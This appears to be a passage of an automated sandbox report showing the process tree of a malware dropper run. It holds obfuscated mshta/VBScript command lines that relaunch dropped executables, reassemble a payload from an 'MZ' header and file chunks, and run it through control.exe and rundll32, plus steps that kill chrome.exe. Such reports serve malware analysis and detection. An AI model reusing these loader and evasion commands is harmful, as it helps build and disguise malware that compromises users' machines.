C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"6⤵PID:2380
-
C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"7⤵PID:4968
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OCj5sMmpJYhWjepTLao3GpVf.exe"C:\Users\Admin\Pictures\Adobe Films\OCj5sMmpJYhWjepTLao3GpVf.exe"6⤵PID:4896
-
-
C:\Users\Admin\Pictures\Adobe Films\Fdm7g1rYptl81FWmIcNLw9Qv.exe"C:\Users\Admin\Pictures\Adobe Films\Fdm7g1rYptl81FWmIcNLw9Qv.exe"6⤵PID:4416
-
-
C:\Users\Admin\Pictures\Adobe Films\v3a5JNV6p_ECxUBimJ0Ek5Y8.exe"C:\Users\Admin\Pictures\Adobe Films\v3a5JNV6p_ECxUBimJ0Ek5Y8.exe"6⤵PID:4784
-
-
C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"6⤵PID:2380
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵PID:5080
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9_dAShtlgGpWTw7khAQAI2mc.exe"C:\Users\Admin\Pictures\Adobe Films\9_dAShtlgGpWTw7khAQAI2mc.exe"6⤵PID:4620
-
-
C:\Users\Admin\Pictures\Adobe Films\AcOaQgiqgr7WN5oZTcCPb8VM.exe"C:\Users\Admin\Pictures\Adobe Films\AcOaQgiqgr7WN5oZTcCPb8VM.exe"6⤵PID:776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1259934706c8.exe4⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun1259934706c8.exeSun1259934706c8.exe5⤵
- Executes dropped EXE
PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12d5375519fd3042a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12d5375519fd3042a.exeSun12d5375519fd3042a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12fa00cf9c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exeSun12fa00cf9c.exe5⤵
- Executes dropped EXE
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exeC:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exe6⤵PID:4008
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12f38be2ba.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12f38be2ba.exeSun12f38be2ba.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1216aa44861b6.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun1216aa44861b6.exeSun1216aa44861b6.exe /mixone5⤵
- Executes dropped EXE
PID:2816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 6566⤵
- Program crash
PID:68
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 6726⤵
- Program crash
PID:2164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 7726⤵
- Program crash
PID:4304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 8086⤵
- Program crash
PID:4496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 7526⤵
- Program crash
PID:3580
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 9086⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 8846⤵
- Program crash
PID:4312
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12ae5f6f719fe11fb.exe4⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12ae5f6f719fe11fb.exeSun12ae5f6f719fe11fb.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3800 -s 18526⤵
- Program crash
PID:3716
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun123ea6485e74.exe4⤵PID:1504
-
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun123ea6485e74.exeSun123ea6485e74.exe5⤵
- Executes dropped EXE
PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun120905af9b0.exe4⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exeSun120905af9b0.exe5⤵
- Executes dropped EXE
PID:1316 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵PID:3944
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe") do taskkill /F -Im "%~NxU"7⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew8⤵PID:3888
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )9⤵PID:1292
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"10⤵PID:1016
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )9⤵PID:4840
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I10⤵PID:4160
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "11⤵PID:4516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"11⤵PID:872
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I11⤵PID:5052
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I12⤵PID:4692
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I13⤵PID:1744
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I14⤵PID:4720
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun120905af9b0.exe"8⤵
- Kills process with taskkill
PID:2936
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12da668880c641f.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun12e7ce43242.exe4⤵PID:1512
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 5724⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12da668880c641f.exeSun12da668880c641f.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:4820
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:3464
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12e7ce43242.exeSun12e7ce43242.exe1⤵
- Executes dropped EXE
PID:1144
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4188 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4208
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4348
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"1⤵PID:1956
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe"2⤵PID:4916
-